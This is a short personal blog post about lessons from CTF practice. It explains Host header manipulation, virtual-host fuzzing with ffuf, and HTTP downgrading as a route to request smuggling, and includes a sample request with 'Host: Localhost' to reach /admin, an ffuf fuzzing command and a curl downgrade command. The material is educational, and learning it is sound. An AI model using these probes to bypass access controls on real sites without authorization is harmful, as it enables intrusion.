HTTP Host Headers, Virtual Host, and HTTP Downgrading oh my!

CTF's are a great way to learn, and that is exactly what I have been doing. I have been learning about HTTP Host Header Manipulation, Virtual Hosts, and HTTP downgrading. Let's talk about what I've learned!

Virtual Hosts are an ubiquitous and awesome way to have multiple websites assigned to one IP address which includes a unique domain name for each virtual host. The way this is distinguished between is using the Host header. This Host header is like an identifier for the different virtual hosts that belong to one IP. As one might expect, this can be used to bypass otherwise blocked web servers, and hack websites. 

Our first culprit would be with the classic localhost (or 127.0.0.1). There is a potential that if a web server uses localhost as a way to route their internal web servers then this can be used as a way to access the back end web server, when one shouldn't. It might look something like this:

GET /admin HTTP/2.0
Host: Localhost

Of course this can be used to access many different endpoints, and testing multiple endpoints (being thorough) is essential. With that in mind be sure to test all ports that you might have discovered in asset discovery. The virtual host might also have different port numbers such as 80, 443, etc. Asset discovery comes in with this, using a tool like ffuf can be essential to finding virtual hosts on an IP. Here's what a command like that might look like:

ffuf -u examplewebsite.com/ -w /path/to/wordlist/Common.txt -H "Host: FUZZ" 

This allows you to fuzz for virtual hosts to attempt to use them as manipulation v-hosts in the Host header. Building a list can be essential to accessing web servers that use or have many virtual hosts. 

Another tactic you can use to try and bypass web servers is a thing called HTTP downgrading, which sounds exactly like it is. There of course have been multiple HTTP versions: 0.9, 1.0, 1.1, 2.0. HTTP Downgrading introduces the ability to downgrade a web server from something like 2.0 to 1.1, or 1.0, or even potentially 0.9! This can allow the hacker to do something called request smuggling(basically sending their front end request straight to the back end web server). Some might think that HTTP 2.0 avoids or protects against request smuggling, but web servers can potentially still have this issue if not configured correctly. You can easily do HTTP downgrading with a curl request that might look like this:

curl examplewebsite.com -v --http1.0 -X POST

This sends a post request to the website, and using the downgraded version might expose something that it shouldn't. 

These techniques aren't overly complicated, nor are they super hard to execute. But they can be devastating and effective if used on the correct endpoints. As always RECON, RECON, RECON. The more information you have, the better equipped you'll be to find these issues. 

I hope you enjoyed this article and it taught you something! Let me know if you have questions and of course, Hack The Planet!!

BlackCatt




Comments

Popular posts from this blog

DEFCON 32: My review as a first time attendee.

Hello Comrade...

Steghide: An introduction